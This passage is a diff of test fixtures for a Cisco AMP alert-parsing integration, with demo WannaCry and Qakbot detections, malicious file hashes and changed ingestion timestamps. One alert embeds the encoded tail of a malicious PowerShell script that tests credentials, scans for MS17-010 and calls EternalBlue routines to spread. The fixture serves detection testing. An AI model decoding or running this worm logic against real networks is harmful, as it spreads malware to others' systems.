QAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkA
YwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\
"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", "code": "553648222", "kind": "alert", 
@@ -2655,7 +2655,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010792400Z", + "ingested": "2021-12-14T14:40:52.874149281Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -2731,7 +2731,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010796400Z", + "ingested": "2021-12-14T14:40:52.874149625Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -2807,7 +2807,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010801700Z", + "ingested": "2021-12-14T14:40:52.874149968Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -2883,7 +2883,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010807200Z", + "ingested": "2021-12-14T14:40:52.874150449Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -2965,7 +2965,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010812400Z", + "ingested": "2021-12-14T14:40:52.874150868Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", 
@@ -3045,7 +3045,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010817700Z", + "ingested": "2021-12-14T14:40:52.874151221Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", 
@@ -3125,7 +3125,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010823Z", + "ingested": "2021-12-14T14:40:52.874151570Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", 
@@ -3205,7 +3205,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010828300Z", + "ingested": "2021-12-14T14:40:52.874151922Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", 
@@ -3285,7 +3285,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010833700Z", + "ingested": "2021-12-14T14:40:52.874152284Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", 
@@ -3365,7 +3365,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010839Z", + "ingested": "2021-12-14T14:40:52.874152633Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", 
@@ -3445,7 +3445,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010844300Z", + "ingested": "2021-12-14T14:40:52.874153183Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", 
@@ -3519,7 +3519,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010849600Z", + "ingested": "2021-12-14T14:40:52.874153535Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -3611,7 +3611,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010854800Z", + "ingested": "2021-12-14T14:40:52.874153888Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3693,7 +3693,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010860100Z", + "ingested": "2021-12-14T14:40:52.874154240Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat 